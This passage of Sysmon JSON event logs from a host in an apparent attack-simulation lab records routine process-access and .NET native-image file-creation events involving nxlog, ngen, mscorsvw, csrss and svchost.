C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:17.826","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9022,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:18.841\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:18.841","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9023,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:19.498\r\nProcessGuid: {E2A3D6B1-13B2-5F25-0000-0010FF611100}\r\nProcessId: 2980\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\ba4-0\\System.Core.dll\r\nCreationUtcTime: 2020-08-01 07:03:19.482","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:19.498","ProcessGuid":"{E2A3D6B1-13B2-5F25-0000-0010FF611100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\ba4-0\\System.Core.dll","CreationUtcTime":"2020-08-01 07:03:19.482","EventReceivedTime":"2020-08-01 07:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9024,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:19.638\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13B7-5F25-0000-001023671100}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:19.638","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13B7-5F25-0000-001023671100}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9025,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:19.638\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13B7-5F25-0000-001023671100}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:19.638","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13B7-5F25-0000-001023671100}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9026,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:19.638\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13B7-5F25-0000-001023671100}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:19.638","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13B7-5F25-0000-001023671100}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9027,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:19.857\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:19.857","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9028,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:20.107\r\nProcessGuid: {E2A3D6B1-13B7-5F25-0000-001023671100}\r\nProcessId: 4700\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\125c-0\\System.Configuration.dll\r\nCreationUtcTime: 2020-08-01 07:03:20.107","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:20.107","ProcessGuid":"{E2A3D6B1-13B7-5F25-0000-001023671100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\125c-0\\System.Configuration.dll","CreationUtcTime":"2020-08-01 07:03:20.107","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9029,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:20.154\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-00103B811000}\r\nTargetProcessId: 4756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\